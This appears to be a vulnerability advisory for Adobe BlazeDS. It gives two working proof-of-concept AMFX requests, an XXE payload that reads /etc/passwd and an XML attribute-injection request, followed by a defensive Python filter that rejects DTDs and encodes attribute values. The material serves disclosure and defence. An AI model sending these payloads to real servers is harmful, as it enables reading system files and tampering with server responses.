Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
The following example AMFX requests are available:

1. XML External Entity injection:

POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>

2. XML injection:

POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf

<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d&quot; injectedattr=&quot;anything"><null/>
</body></amfx>
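A defensive check for both request shapes above, as an added example that is not part of the original advisory or of BlazeDS: a Python filter that refuses any AMFX body carrying a DTD, and a comparison of concatenated versus encoded attribute output for the `responseURI` value. The function names, the `echo_*` helpers and the trimmed sample bodies are constructed for illustration; that the value is written back into a response attribute, and that legitimate AMFX clients send no DOCTYPE, are assumptions.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

class RejectedAMFX(Exception):
    """The request body must not be passed on to the message broker."""

def screen_amfx(body: bytes) -> dict:
    """Parse an AMFX body, refuse any DTD, return the <body> element's attributes."""
    attrs = {}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Assumption: legitimate AMFX carries no DTD, so any DOCTYPE is refused
        # before an ENTITY declared in it can be referenced.
        raise RejectedAMFX("DOCTYPE declaration in AMFX request")

    def on_start(name, a):
        if name == "body":
            attrs.update(a)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError as exc:
        raise RejectedAMFX(f"malformed XML: {exc}") from exc
    return attrs

def echo_naive(value: str) -> str:
    # Hypothetical response builder: string concatenation, no encoding.
    return '<body targetURI="' + value + '"/>'

def echo_encoded(value: str) -> str:
    # quoteattr() chooses the quote character and escapes &, <, > and quotes.
    return "<body targetURI=" + quoteattr(value) + "/>"

def attrs_of(xml_text: str) -> dict:
    """Attributes a consumer of the response would see on the element."""
    return dict(ET.fromstring(xml_text).attrib)

# Constructed samples, trimmed from the two requests above.
WITH_DTD = (b'<?xml version="1.0" encoding="utf-8"?>'
            b'<!DOCTYPE test [ <!ENTITY x3 SYSTEM "file:///constructed-placeholder"> ]>'
            b'<amfx ver="3"><body><string>&x3;</string></body></amfx>')
WITH_QUOTES = (b'<?xml version="1.0" encoding="utf-8"?><amfx ver="3">'
               b'<body targetURI="" responseURI="d&quot; injectedattr=&quot;anything">'
               b'<null/></body></amfx>')
```

The parsed `responseURI` contains literal double quotes, so the concatenated form yields two attributes while the encoded form yields one whose value round-trips unchanged.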